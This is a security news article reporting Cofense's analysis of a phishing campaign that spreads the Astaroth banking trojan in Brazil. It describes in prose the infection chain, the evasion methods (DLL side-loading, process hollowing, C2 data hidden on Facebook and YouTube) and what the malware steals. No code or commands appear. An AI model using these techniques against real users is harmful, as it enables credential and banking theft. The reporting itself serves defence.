Facebook, YouTube used in Brazilian phishing scheme

News by Doug Olenick

A phishing campaign utilises Facebook and YouTube, along with insider help from a top tier security company service, to convince its victims to open and download a malicious attachment

A cyber-criminal gang has put together a phishing campaign that utilises several trusted sources such as Facebook and YouTube, along with insider help from a top tier security company service, to convince its victims to open and download a malicious attachment.

Cofense Intelligence found the malicious actors, who are only targeting Brazilians, are extensively using trusted names, legitimate Windows services and the Cloudflare Workers to inject the Astaroth trojan with the aim of stealing banking credentials. However, despite the effort put forth by the gang Cofense researchers said the attacks can be stopped if the proper precautions, both human and technical, are in place.

The current campaign is sending emails only in Portuguese pretending to be either an invoice, show ticket or civil lawsuit. In each case the body of the email is socially engineered to convince the recipient to open and then download the attached .htm file.

Once the .htm file is downloaded a .zip archive geo-fenced to Brazil and containing malicious .LNK file is dropped. The insider threat is then used when the .LNK file downloads a JavaScript from a Cloudflare Worker’s account. This, in turn, downloads multiple files that help obfuscate and execute the Astaroth information stealer, including two .DLL files that are joined together and side-loaded into a legitimate program named ‘C:\Program Files\Internet Explorer\ExtExport.exe’, Cofense wrote.

The latter downloads help with avoiding AV, white listing and URL filtering security functions.

The malware then uses a technique called process hollowing where it takes previously downloaded code and injects it into several legitimate programs, the most important of which is unins000.exe that is associated with the Brazilian banking system.

Astaroth then uses the normally trustworthy sites Youtube and Facebook profiles to host and maintain the C2 configuration data.

" The data is within posts on Facebook or within the profile information of user accounts on YouTube. By hosting the C2 data within these trusted sources, the threat actors can bypass network security measures like content filtering. The threat actors are also able to dynamically change the content within these trusted sources so they can deter the possibility of their infrastructure being taken down," Cofense wrote.

At this point the information stealer goes to work and gathers financial data, stored passwords in the browser, email client credentials and SSH credentials.

"Astaroth’s complex infection chain targeting Brazilian citizens shows the value in layered defense as well as education of the end user. At each step, the security stack could have made an impact to stop the infection chain; however, through the use of legitimate processes and outside trusted sources, Astaroth was able to negate those defensive measures," Cofense concluded.

This article was originally published on SC Media US.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews